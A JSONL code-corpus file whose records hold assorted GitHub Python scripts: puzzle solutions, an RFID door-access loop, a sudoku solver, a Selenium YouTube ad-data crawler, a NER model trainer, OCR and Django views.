diff --git "a/2554.jsonl" "b/2554.jsonl" new file mode 100644--- /dev/null +++ "b/2554.jsonl" @@ -0,0 +1,2421 @@ +{"seq_id":"5611383435","text":"from aocd.models import Puzzle\n\n\ndef part1(data):\n priority_sum = 0\n for d in data:\n whoops = \"\".join(\n set(d[0 : len(d) // 2 :]).intersection(set(d[len(d) // 2 : :]))\n )\n priority_sum += ord(whoops) - 96 if whoops.islower() else ord(whoops) - 64 + 26\n\n return priority_sum\n\n\ndef part2(data):\n priority_sum = 0\n for e1, e2, e3 in zip(data[0::3], data[1::3], data[2::3]):\n badge = \"\".join(set(e1).intersection(e2).intersection(e3))\n priority_sum += ord(badge) - 96 if badge.islower() else ord(badge) - 64 + 26\n\n return priority_sum\n\n\nif __name__ == \"__main__\":\n puzzle = Puzzle(2022, 3)\n\n # convert string input to lists of ints\n data = puzzle.input_data.split(\"\\n\")\n\n # run part 1\n answer1 = part1(data)\n\n # run part 2\n answer2 = part2(data)\n\n print(f\"Part 1: {answer1}\")\n print(f\"Part 2: {answer2}\")\n","repo_name":"anissa111/advent-of-code","sub_path":"2022/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"38503191651","text":"from machine import Pin\nfrom mfrc522 import MFRC522\nimport time\n \nlector = MFRC522(spi_id=0,sck=2,miso=4,mosi=3,cs=1,rst=0)\n\nrojo = Pin(13, Pin.OUT)\nverde = Pin(12, Pin.OUT)\n\nTARJETA = 2766409360\nLLAVERO = 3643110918\n\nprint(\"Lector activo...\\n\")\n\nwhile True:\n lector.init()\n (stat, tag_type) = lector.request(lector.REQIDL)\n if stat == lector.OK:\n (stat, uid) = lector.SelectTagSN()\n if stat == lector.OK:\n identificador = int.from_bytes(bytes(uid),\"little\",False)\n \n if identificador == TARJETA:\n print(\"UID: \"+ str(identificador)+\" Acceso concedido\")\n rojo.value(0)\n verde.value(1)\n time.sleep(2)\n verde.value(0)\n \n #elif identificador == LLAVERO:\n # print(\"UID: \"+ str(identificador)+\" Acceso concedido\")\n # rojo.value(0)\n # verde.value(1)\n # time.sleep(2)\n # verde.value(0)\n \n else:\n print(\"UID: \"+ str(identificador)+\" desconocido: Acceso denegado\")\n rojo.value(1)\n verde.value(0)\n time.sleep(2)\n rojo.value(0)\n","repo_name":"ComputadorasySensores/Capitulo70","sub_path":"control_acceso.py","file_name":"control_acceso.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"13524142267","text":"\"\"\"Sudoku solver\"\"\"\nimport numpy as np\n\nclass SudokuSolver():\n\n def __init__(self):\n pass\n\n def __call__(self, grid: list) -> list:\n \"\"\"Solve the given sudoku grid using backtracking (brute force).\n\n See: https://en.wikipedia.org/wiki/Sudoku_solving_algorithms\n\n Parameters\n ----------\n grid : list\n Sudoku grid with blanks\n\n Returns\n -------\n grid : list\n Solved sudoku grid\n \"\"\"\n\n grid = np.array(grid)\n print(f\"\\nStart Solving:\\n {grid}\\n\")\n\n open_positions = np.where(grid == 0)\n\n candidate_pointer = 0\n while candidate_pointer < len(open_positions[0]):\n\n position = get_position(candidate_pointer, open_positions)\n candidate = find_candidate(grid, position)\n\n if isinstance(candidate, int):\n grid[position] = candidate\n candidate_pointer += 1\n else:\n\n update_pointer = candidate_pointer - 1\n\n while update_pointer >= 0:\n\n position = get_position(update_pointer, open_positions)\n update = find_increment(grid, position)\n\n if isinstance(update, int):\n grid[position] = update\n candidate_pointer = update_pointer + 1\n break\n\n grid[position] = 0\n update_pointer -= 1\n\n if update_pointer == -1:\n raise\n\n print(f\"Valid Solution:\\n {grid}\")\n return grid\n\n\ndef get_position(pointer: int, open_positions: list) -> tuple:\n \"\"\"Return the current position indizes (row,col)\n\n Parameters\n ----------\n pointer : int\n Points to the current open position\n open_positions : list\n List of all open positions that need to be filled with a\n number between 1 and 9\n\n Returns\n -------\n tuple\n The current position (row,col)\n \"\"\"\n return open_positions[0][pointer], open_positions[1][pointer]\n\n\ndef find_candidate(grid: list, position: tuple) -> int:\n \"\"\"Retrieve a possible candidate for the given position\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n int\n A possible candidate\n \"\"\"\n for candidate in np.arange(1, 10, 1):\n if valid_candidate(candidate, grid, position):\n return int(candidate)\n return None\n\n\ndef find_increment(grid: list, position: tuple) -> int:\n \"\"\"Retrieve the first possible increment for the given position\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n int\n A possible increment\n \"\"\"\n for update in np.arange(grid[position]+1, 10, 1):\n if valid_candidate(update, grid, position):\n return int(update)\n\n return None\n\n\ndef valid_candidate(candidate: int, grid: list, position: tuple):\n \"\"\"Check that the candidate does not violate the frequency condition\n in the corresponding row, column and box.\n\n Parameters\n ----------\n candidate : int\n Description\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n boolean\n Indicator whether candidate violates the frequency condition or\n not.\n \"\"\"\n\n row = grid[position[0], :]\n col = grid[:, position[1]]\n box = get_box(grid, position).flatten()\n \n present_values = set(np.concatenate((row,col,box),axis=0))\n \n return not (candidate in present_values)\n\n\ndef get_box(grid: list, position: tuple):\n \"\"\"Retrive the grid to the corresponding position.\n The common grid is 9x9 and there are 3 boxes vertically and horizontally\n\n grid = (\n Box1 Box2 Box3\n Box4 Box5 Box6\n Box7 Box8 Box9\n )\n\n Parameters\n ----------\n grid : list\n Sudoku Grid\n position : tuple\n Current position on grid (row,col)\n\n Returns\n -------\n list\n The corresponding box of the current position on the grid\n\n \"\"\"\n\n box_h = position[0] // 3\n box_v = position[1] // 3\n\n ridx_from = 3 * box_h\n ridx_to = 3 * box_h + 3\n cidx_from = 3 * box_v\n cidx_to = 3 * box_v + 3\n\n return grid[ridx_from:ridx_to, cidx_from:cidx_to]\n","repo_name":"SchernHe/sudoku","sub_path":"sudoku/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36560731980","text":"import time\nimport re\nfrom utils import *\nfrom video_controls import *\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver import ActionChains\n\nclass IframeExitException(Exception):\n pass\n\n\ndef get_ad_duration(driver) -> int:\n\n try:\n time_left_element = driver.find_element(\n By.CSS_SELECTOR, \"span.ytp-ad-duration-remaining > div.ytp-ad-text\"\n )\n except NoSuchElementException:\n return -1\n\n time_units = time_left_element.text.split(\":\")\n time_units.reverse()\n time_left = 0\n\n for index, value in enumerate(time_units):\n time_left = time_left + int(value)*60**index\n\n return time_left\n\ndef get_number_of_ads_left(driver) -> int:\n\n try:\n ad_text = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-simple-ad-badge > .ytp-ad-text\").get_attribute(\"innerHTML\")\n except NoSuchElementException:\n return 0\n \n \n total_pattern = r\"(?:(?<=Ad \\d of )|(?<=Sponsored \\d of ))\\d\"\n current_pattern = r\"(?:(?<=Ad )|(?<=Sponsored ))\\d\"\n\n total_match = re.search(total_pattern, ad_text)\n current_match = re.search(current_pattern, ad_text)\n\n if total_match and current_match:\n return int(total_match[0]) - int(current_match[0])\n \n return 0\n\n\ndef get_ad_order(driver) -> int:\n\n try:\n ad_text = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-simple-ad-badge > .ytp-ad-text\").get_attribute(\"innerHTML\")\n except NoSuchElementException:\n return 0\n\n pattern = r\"(?:(?<=Ad )|(?<=Sponsored ))\\d\"\n match = re.search(pattern, ad_text)\n if match:\n return int(match[0])\n \n if \"Ad\" or \"Sponsored\" in ad_text:\n return 1\n \n return 0\n\ndef get_reasons(driver) -> list:\n try:\n WebDriverWait(driver, 3).until(EC.presence_of_element_located(\n (By.CLASS_NAME, \"QVfAMd-wPzPJb-xPjCTc-ibnC6b\")\n ))\n google_info = driver.find_elements(By.CLASS_NAME, \"QVfAMd-wPzPJb-xPjCTc-ibnC6b\")\n google_info = [element.get_attribute('textContent') for element in google_info]\n except:\n google_info = []\n try:\n WebDriverWait(driver, 3).until(EC.presence_of_element_located(\n (By.CLASS_NAME, \"zpMl8e-C2o4Ve-wPzPJb-xPjCTc-ibnC6b\")\n ))\n other_info = driver.find_elements(By.CLASS_NAME, \"zpMl8e-C2o4Ve-wPzPJb-xPjCTc-ibnC6b\")\n other_info = [element.get_attribute('innerHTML') for element in other_info] \n except:\n other_info = []\n \n if not google_info + other_info:\n current_stamp = get_test_id()\n username = get_username(driver)\n try:\n driver.save_screenshot(f\"error_screenshots_{username}/no_targeting_reasons_{current_stamp}.png\")\n except:\n pass\n\n return google_info + other_info\n\n\ndef get_iframe_routine(driver, username, video_id, type_of_ad, wait_time) -> tuple:\n # type_of_ad = \"side\", \"preroll\", \"preroll_companion\", \"promoted_video\"\n\n reasons, advertiser_info = None, None\n\n try:\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(\n (By.ID, \"iframe\")\n ))\n iframe = driver.find_element(By.ID, \"iframe\")\n \n except:\n\n current_stamp = get_test_id()\n\n print(f\"{username}: detected {type_of_ad} ad but no iframe, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_no_iframe_{video_id}_{current_stamp}.png\")\n\n switch_back(driver)\n\n if type_of_ad == \"preroll\":\n return get_preroll_ad_companion_info(driver)\n\n return None, None\n\n try:\n driver.switch_to.frame(iframe)\n WebDriverWait(driver, wait_time).until(EC.presence_of_element_located(\n (By.XPATH, '//div[text()=\"My Ad Center\"]')\n ))\n\n reasons = get_reasons(driver)\n advertiser_info = get_advertiser_info(driver)\n\n except:\n try:\n # try re-clicking the iframe one more time\n switch_back(driver)\n iframe = driver.find_element(By.ID, \"iframe\")\n driver.switch_to.frame(iframe)\n\n reasons = get_reasons(driver)\n advertiser_info = get_advertiser_info(driver)\n return reasons, advertiser_info\n except:\n pass\n\n current_stamp = get_test_id()\n \n print(f\"{username}: {type_of_ad} ad iframe timed out, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_timedout_{video_id}_{current_stamp}.png\")\n switch_back(driver)\n return reasons, advertiser_info\n\n try:\n exit_info_iframe(driver)\n except:\n current_stamp = get_test_id()\n \n print(f\"{username}: can't exit from {type_of_ad} ad popup, video_id: {video_id}\")\n driver.save_screenshot(f\"error_screenshots_{username}/{type_of_ad}_timedout_{current_stamp}.png\")\n\n raise IframeExitException()\n\n return reasons, advertiser_info\n\n\ndef exit_info_iframe(driver):\n\n try:\n exit_button = driver.find_element(\n By.CSS_SELECTOR, \".VfPpkd-Bz112c-LgbsSe.yHy1rc.eT1oJ.mN1ivc.zBmRhe-LgbsSe\" \n )\n driver.execute_script(\"arguments[0].click();\", exit_button)\n except:\n pass\n \n switch_back(driver)\n\n\ndef get_advertiser_info(driver) -> tuple:\n\n advertiser_name, advertiser_loc = None, None\n\n try:\n ad_container = driver.find_elements(By.CLASS_NAME, \"G5HdJb-fmcmS\")\n if ad_container:\n advertiser_name = ad_container[0].get_attribute(\"innerHTML\")\n advertiser_loc = ad_container[1].get_attribute(\"innerHTML\")\n except IndexError:\n return advertiser_name, None\n except NoSuchElementException:\n pass\n\n return advertiser_name, advertiser_loc\n\n\ndef get_preroll_ad_companion_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n info_button = driver.find_element(By.CSS_SELECTOR, \"#action-companion-ad-info-button\").find_element(By.CSS_SELECTOR, \"button\")\n driver.execute_script(\"arguments[0].click();\", info_button)\n\n except NoSuchElementException:\n \n print(f\"{username}: preroll ad companion info button is not found\")\n driver.save_screenshot(f\"error_screenshots_{username}/no_preroll_ad_companion_info_button_{video_id}.png\") \n\n return None, None\n \n return get_iframe_routine(driver, username, video_id, \"preroll_companion\", 2)\n\ndef get_preroll_ad_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n reasons, advertiser_info = None, None\n\n try:\n WebDriverWait(driver, 2).until(EC.presence_of_element_located(\n (By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-button-link.ytp-ad-clickable\")\n ))\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-button-link.ytp-ad-clickable\"\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", info_button)\n \n except:\n \n msg = f\"{username}: preroll ad info button is not found\"\n print(msg)\n video_id = get_video_id(driver.current_url)\n driver.save_screenshot(f\"error_screenshots_{username}/no_preroll_ad_info_button_{video_id}.png\") \n return get_preroll_ad_companion_info(driver)\n\n\n try:\n reason_container = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-info-dialog-ad-reasons\")\n li = reason_container.find_elements(By.CSS_SELECTOR,\"li\")\n reasons = [element.get_attribute('innerHTML') for element in li] \n return reasons, get_advertiser_info(driver)\n except NoSuchElementException:\n pass\n\n return get_iframe_routine(driver, username, video_id, \"preroll\", 2)\n\n\ndef get_preroll_ad_id(driver) -> str | None:\n\n try:\n # right clicking the video and opening the \"stats for nerds\" menu\n action = ActionChains(driver)\n video_player = driver.find_element(\n By.CSS_SELECTOR, \"#movie_player > div.html5-video-container > video\"\n )\n action.context_click(video_player).perform()\n stats_button = driver.find_element(\n By.CSS_SELECTOR,\n \"div.ytp-popup.ytp-contextmenu > div > div > div:nth-child(7)\",\n )\n driver.execute_script(\"arguments[0].click();\", stats_button)\n id_element = driver.find_element(By.CSS_SELECTOR, \".ytp-sfn-cpn\")\n\n # use split to extract only the video id characters\n ad_id = id_element.text.split()[0]\n\n exit_button = driver.find_element(\n By.CSS_SELECTOR, \"button.html5-video-info-panel-close.ytp-button\"\n )\n driver.execute_script(\"arguments[0].click();\", exit_button)\n return ad_id\n\n except NoSuchElementException:\n return None\n except ElementNotInteractableException:\n return None\n except IndexError:\n print(f\"index error, returning id_element.text = {id_element.text}\")\n return id_element.text\n\n \ndef get_preroll_ad_companion_site(driver) -> tuple:\n\n try:\n site = driver.find_element(By.CSS_SELECTOR, \"span#domain\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n return None, None\n \n try:\n header = driver.find_element(By.CSS_SELECTOR,\".style-scope.ytd-action-companion-ad-renderer#header\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n return site, None\n \n return site, header\n\ndef get_preroll_ad_site(driver) -> tuple:\n\n site, card_headline, card_descr = \"\", \"\", \"\"\n\n # site is usually the link to advertiser's site, but sometimes it's just the site name\n try:\n site = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-visit-advertiser-button.ytp-ad-button-link\"\n ).get_attribute(\"aria-label\").strip()\n\n except NoSuchElementException:\n pass\n \n try:\n card_headline = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-text.ytp-flyout-cta-headline\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n try:\n card_descr = driver.find_element(By.CSS_SELECTOR, \".ytp-ad-text.ytp-flyout-cta-description\").get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n card = card_headline + \" \" + card_descr\n card = card if card.strip() else None\n\n if not site:\n return get_preroll_ad_companion_site(driver)\n\n return site, card\n \n\n\n\ndef get_side_ad_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n menu_button = driver.find_element(\n By.CSS_SELECTOR,\n \".style-scope.ytd-promoted-sparkles-web-renderer > yt-icon-button > button\",\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", menu_button)\n\n except NoSuchElementException:\n return None, None\n\n \n # potentially deprecated drop-down menu that has My Ad Center as an option\n try:\n\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n \"#items > ytd-menu-navigation-item-renderer.style-scope.ytd-menu-popup-renderer.iron-selected > a > tp-yt-paper-item\",\n )\n\n driver.execute_script(\"arguments[0].click();\", info_button)\n except NoSuchElementException:\n pass\n except:\n print(f\"{username}: can't click side info button\")\n print(traceback.format_exc())\n pass\n \n return get_iframe_routine(driver, username, video_id, \"side\", 5)\n\n\ndef get_side_ad_site(driver):\n\n # site is usually the link to advertiser's site, but sometimes it's just the site name\n\n try:\n side_ad_container = driver.find_element(By.CSS_SELECTOR, \"#website-text\")\n site = side_ad_container.get_attribute(\"innerHTML\").strip()\n return site\n except NoSuchElementException:\n return None\n\n\n\ndef click_side_ad(driver):\n\n try:\n\n element = driver.find_element(\n By.CSS_SELECTOR,\n \".style-scope.ytd-promoted-sparkles-web-renderer > yt-button-shape > button\"\n )\n\n driver.execute_script(\"arguments[0].click();\", element)\n except NoSuchElementException:\n return None\n\n # save current tab and switch chromedriver's focus to the new tab\n video_tab = driver.current_window_handle\n tabs_open = driver.window_handles\n driver.switch_to.window(tabs_open[1])\n \n url = driver.current_url\n while url == \"about:blank\":\n url = driver.current_url\n driver.execute_script(\"window.stop();\")\n url = driver.current_url\n driver.close()\n driver.switch_to.window(video_tab)\n return url\n\ndef click_preroll_ad(driver):\n\n try:\n element = driver.find_element(\n By.CSS_SELECTOR,\n \"button.ytp-ad-button.ytp-ad-visit-advertiser-button.ytp-ad-button-link\"\n )\n\n driver.execute_script(\"arguments[0].click();\", element)\n except NoSuchElementException:\n return None\n\n # save current tab and switch chromedriver's focus to the new tab\n video_tab = driver.current_window_handle\n tabs_open = driver.window_handles\n driver.switch_to.window(tabs_open[1])\n \n url = driver.current_url\n while url == \"about:blank\":\n url = driver.current_url\n driver.execute_script(\"window.stop();\")\n url = driver.current_url\n driver.close()\n driver.switch_to.window(video_tab)\n return url\n\ndef get_side_ad_text(driver):\n\n title, body = \"\", \"\"\n\n try:\n title_container = driver.find_element(By.CSS_SELECTOR, \"#title.style-scope.ytd-promoted-sparkles-web-renderer.yt-simple-endpoint\")\n title = title_container.get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n try:\n body_container = driver.find_element(By.CSS_SELECTOR, \"#description.style-scope.ytd-promoted-sparkles-web-renderer.yt-simple-endpoint\")\n body = body_container.get_attribute(\"innerHTML\").strip()\n except NoSuchElementException:\n pass\n\n text = title + body\n text = text if text else None\n return text\n\n\ndef get_side_ad_img(driver):\n\n try:\n img_container = driver.find_element(By.CSS_SELECTOR, \"#thumbnail.style-scope.ytd-promoted-sparkles-web-renderer > img\")\n img_src = img_container.get_attribute(\"src\")\n except NoSuchElementException:\n return None\n\n return img_src\n\n\ndef get_promoted_video_title(driver):\n\n\n try:\n container = driver.find_element(By.CSS_SELECTOR, \"#video-title.style-scope.ytd-compact-promoted-video-renderer\")\n title = container.get_attribute(\"title\")\n except NoSuchElementException:\n return None\n\n return title\n\n\ndef get_promoted_video_channel(driver) -> str:\n\n try:\n ad_container = driver.find_element(By.CSS_SELECTOR, \"#endpoint-link.yt-simple-endpoint.style-scope.ytd-compact-promoted-video-renderer\")\n channel_container = ad_container.find_element(By.CSS_SELECTOR, \"#text > a\")\n channel = channel_container.get_attribute(\"innerHTML\")\n return channel\n except NoSuchElementException:\n return None\n\n\n\ndef get_promoted_video_info(driver) -> tuple:\n\n username = get_username(driver)\n video_id = get_video_id(driver.current_url)\n\n try:\n menu_button = driver.find_element(\n By.CSS_SELECTOR,\n \".style-scope.ytd-compact-promoted-video-renderer > yt-icon-button > button\")\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", menu_button)\n except NoSuchElementException:\n return None, None\n \n try:\n WebDriverWait(driver, 1).until(EC.presence_of_element_located(\n (By.CSS_SELECTOR,\n \"#items > ytd-menu-navigation-item-renderer > a > tp-yt-paper-item\",\n )\n ))\n info_button = driver.find_element(\n By.CSS_SELECTOR,\n \"#items > ytd-menu-navigation-item-renderer > a > tp-yt-paper-item\"\n )\n time.sleep(1)\n driver.execute_script(\"arguments[0].click();\", info_button)\n except:\n pass\n\n return get_iframe_routine(driver, username, video_id, \"promoted_video\", 2)\n\n\ndef get_promoted_video_url(driver) -> str | None:\n\n try:\n element = driver.find_element(\n By.CSS_SELECTOR,\n \"#rendering-content > ytd-compact-promoted-video-renderer > div > a\",\n )\n\n raw_url = element.get_attribute(\"href\")\n pattern = r\"(?<=video_id=).{11}\"\n match = re.search(pattern, raw_url)\n\n if match:\n return \"https://www.youtube.com/watch?v=\" + match[0]\n\n except NoSuchElementException:\n return None\n\n\n\n","repo_name":"catxmai/youtube-ad-crawler-public","sub_path":"get_ad_info.py","file_name":"get_ad_info.py","file_ext":"py","file_size_in_byte":16807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32752337587","text":"\"\"\"\nThis module contains algorithms to train and test BERT and Linear Layer + CRF models.\nAuthor: Lucas Pavanelli\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n\nclass Trainer:\n \"\"\"\n Trains and tests BERT and Linear Layer + CRF models.\n\n Parameters\n ----------\n model : torch.nn.Module\n PyTorch model\n batch : int\n Batch size.\n is_bert : bool\n If model is a BERT model or not.\n criterion : torch.nn\n PyTorch criterion\n device : torch.device\n PyTorch device\n\n Attributes\n ----------\n model : torch.nn.Module\n PyTorch model\n batch : int\n Batch size.\n is_bert : bool\n If model is a BERT model or not.\n criterion : torch.nn\n PyTorch criterion\n device : torch.device\n PyTorch device\n \"\"\"\n def __init__(self, model, batch, is_bert=False, criterion=nn.CrossEntropyLoss(), device=\"cpu\"):\n self.model = model\n self.is_bert = is_bert\n self.batch = batch\n self.criterion = criterion\n self.device = device\n\n def _train_linear_layer_crf(self, train_data, optimizer, epoch):\n self.model.train()\n loss, losses = 0, 0\n for i, (token_ids, tag_ids, _) in enumerate(train_data):\n # Init\n optimizer.zero_grad()\n # Calculate loss\n l = self.model.loss(token_ids, tag_ids)\n loss += l\n losses += l\n if (i + 1) % self.batch == 0:\n # Backpropagation\n loss = loss / self.batch\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n # Display\n print('Train Epoch: {} \\tLoss: {:.6f}'.format(epoch, losses / i), end='\\r')\n loss = 0\n print()\n\n def _train_bert(self, train_data, optimizer, epoch):\n loss, losses = 0, 0\n for i, (token_ids, subwords_idx, tag_ids) in enumerate(train_data):\n # Init\n optimizer.zero_grad()\n # Predict\n output = self.model(token_ids, subwords_idx)\n # Calculate loss\n l = self.criterion(output, tag_ids.to(self.device))\n loss += l\n losses += l\n if (i + 1) % self.batch == 0:\n # Backpropagation\n loss = loss / self.batch\n loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n # Display\n print('Train Epoch: {} \\tLoss: {:.6f}'.format(epoch, losses / i), end='\\r')\n loss = 0\n print()\n\n def train(self, train_data, optimizer, epoch):\n \"\"\"\n Trains model using train data.\n\n Parameters\n ----------\n train_data : list\n List of tuples representing train data.\n optimizer : optim.SGD\n PyTorch optimizer.\n epoch : int\n Number of epoch\n \"\"\"\n self.model.train()\n if self.is_bert:\n self._train_bert(train_data, optimizer, epoch)\n else:\n self._train_linear_layer_crf(train_data, optimizer, epoch)\n\n def _test_linear_layer_crf(self, test_data):\n y_pred, y_true = [], []\n for i, (token_ids, tag_ids, _) in enumerate(test_data):\n output = self.model(token_ids)\n y_pred.append([int(w) for w in list(output[0])])\n y_true.append([int(w) for w in list(tag_ids[0])])\n return y_true, y_pred\n\n def _test_bert(self, test_data):\n y_pred, y_true = [], []\n for i, (token_ids, subwords_idx, tag_ids) in enumerate(test_data):\n output = self.model(token_ids, subwords_idx)\n y_pred.append([int(w) for w in list(torch.argmax(output, dim=1))])\n y_true.append([int(w) for w in list(tag_ids)])\n return y_true, y_pred\n\n def test(self, test_data):\n \"\"\"\n Tests model using test data.\n\n Parameters\n ----------\n test_data : list\n List of tuples representing test data.\n\n Returns\n -------\n list\n True and predicted values\n \"\"\"\n self.model.eval()\n if self.is_bert:\n return self._test_bert(test_data)\n else:\n return self._test_linear_layer_crf(test_data)\n","repo_name":"pavalucas/Bete","sub_path":"src/ner/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38858866057","text":"import io\n\nfrom google.cloud import vision\n\nfrom extract import extract\n\nclient = vision.ImageAnnotatorClient()\n\nfile = open(\"final.csv\", \"w\")\n\nfile.write(\"Box-ID,Voter ID,Name,Parent Name,House No.,Age,Gender\\n\")\n\nfor row_idx in range(10):\n for col_idx in range(3):\n with io.open(\"output/5/\" + str(col_idx) + \"_\" + str(row_idx) + \".png\", 'rb') as image_file:\n content = image_file.read()\n\n image = vision.Image(content=content)\n\n response = client.text_detection(image=image)\n if response.error.message:\n raise Exception(\n '{}\\nFor more info on error messages, check: '\n 'https://cloud.google.com/apis/design/errors'.format(\n response.error.message))\n texts = response.text_annotations\n\n print(texts[0].description)\n file.write(extract(texts[0].description))\n","repo_name":"Oxvsys/pdf-to-excel","sub_path":"test-gcp-vision.py","file_name":"test-gcp-vision.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26378742865","text":"from django.shortcuts import render, redirect\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n# from django.contrib.auth import login, logout\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\n\ndef registro(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save() \n username = form.cleaned_data.get('username')\n messages.success(request, f'Cuenta creada para {username}. Ya puede iniciar sesion')\n return redirect ('users:login')\n else:\n form = UserRegisterForm()\n\n return render(request, 'users/register.html', {'formulario':form})\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n user_form = UserUpdateForm(request.POST, instance=request.user)\n prof_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n \n if user_form.is_valid() and prof_form.is_valid():\n user_form.save()\n prof_form.save()\n messages.success(request, f'Su cuenta ha sido actualizada')\n return redirect('users:perfil')\n \n else:\n user_form = UserUpdateForm(instance=request.user)\n prof_form = ProfileUpdateForm(instance=request.user.profile)\n \n context = {'form_usuario':user_form, 'form_perfil':prof_form }\n \n return render(request, 'users/profile.html', context)","repo_name":"xpsylon/TerapiaOnline","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43634258969","text":"#!/usr/bin/env python\n\nimport sys, smtplib\n\nif len(sys.argv) != 2 or not len(sys.argv[1]):\n\tsys.exit(1)\n\narticle = sys.argv[1]\nshortArticle = article\nif len(shortArticle) > 64:\n\tshortArticle = shortArticle[:64] + '...'\naddress = 'perot.me-comment-' + shortArticle + '@perot.me'\n\n# Could use SMTP_SSL but this is all local traffic\nserver = smtplib.SMTP('localhost')\nserver.sendmail(\n\taddress,\n\taddress,\n\t'\\r\\n'.join((\n\t\t'From: ' + address,\n\t\t'To: ' + address,\n\t\t'Subject: [perot.me] ' + article + ': New comment notification',\n\t\t'',\n\t\t'There are new comments waiting on article ' + article + ':',\n\t\t'',\n\t\t'https://perot.me/' + article\n\t))\n)\nserver.quit()\n","repo_name":"EtiennePerot/perot.me","sub_path":"src/blog/comments/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"73834884213","text":"import heapq\n\nclass Solution:\n def kSmallestPairs(self, nums1, nums2, k: int):\n heap, res = [], []\n if len(nums1) == 0 or len(nums2) == 0:\n return []\n\n for i in range(len(nums1)):\n for j in range(len(nums2)):\n heapq.heappush(heap, (nums1[i] + nums2[j], (nums1[i], nums2[j])))\n if k > len(nums1) * len(nums2):\n size = len(nums1) * len(nums2)\n else:\n size = k\n for _ in range(size):\n val = heapq.heappop(heap)\n res.append(val[1])\n return res\n","repo_name":"kalmad99/CompetitiveProgramming","sub_path":"Daily Questions/findKPairswithSmallestSums.py","file_name":"findKPairswithSmallestSums.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1660728386","text":"import sys\ninput = sys.stdin.readline\ndef sol():\n N = int(input())\n balls = list(input().rstrip())\n # 공 개수\n rcnt = balls.count('R')\n bcnt = balls.count('B')\n # 한 공만 있다면 0\n if not rcnt or not bcnt:\n return 0\n # 양극단에서 연속적인 공의 개수 찾기\n l = balls[0]\n lcon = 1\n r = balls[-1]\n rcon = 1\n for i in range(1, N):\n if l != balls[i]:\n break\n lcon += 1\n for i in range(N - 2, -1, -1):\n if r != balls[i]:\n break\n rcon += 1\n # 경우의 수\n ans = N\n # 공을 왼쪽으로 모으는 경우\n if l == 'B':\n ans = min(ans, bcnt - lcon)\n else:\n ans = min(ans, rcnt - lcon)\n # 공을 오른쪽으로 모으는 경우\n if r == 'B':\n ans = min(ans, bcnt - rcon)\n else:\n ans = min(ans, rcnt - rcon)\n # 양극단에 위치한 공이 아니더라도 수가 적다면\n if rcnt < bcnt:\n ans = min(ans, rcnt)\n elif rcnt > bcnt:\n ans = min(ans, bcnt)\n return ans\n\nprint(sol())","repo_name":"mintropy/algorithm_pulzo","sub_path":"지현배/2110/1008/17615.py","file_name":"17615.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} 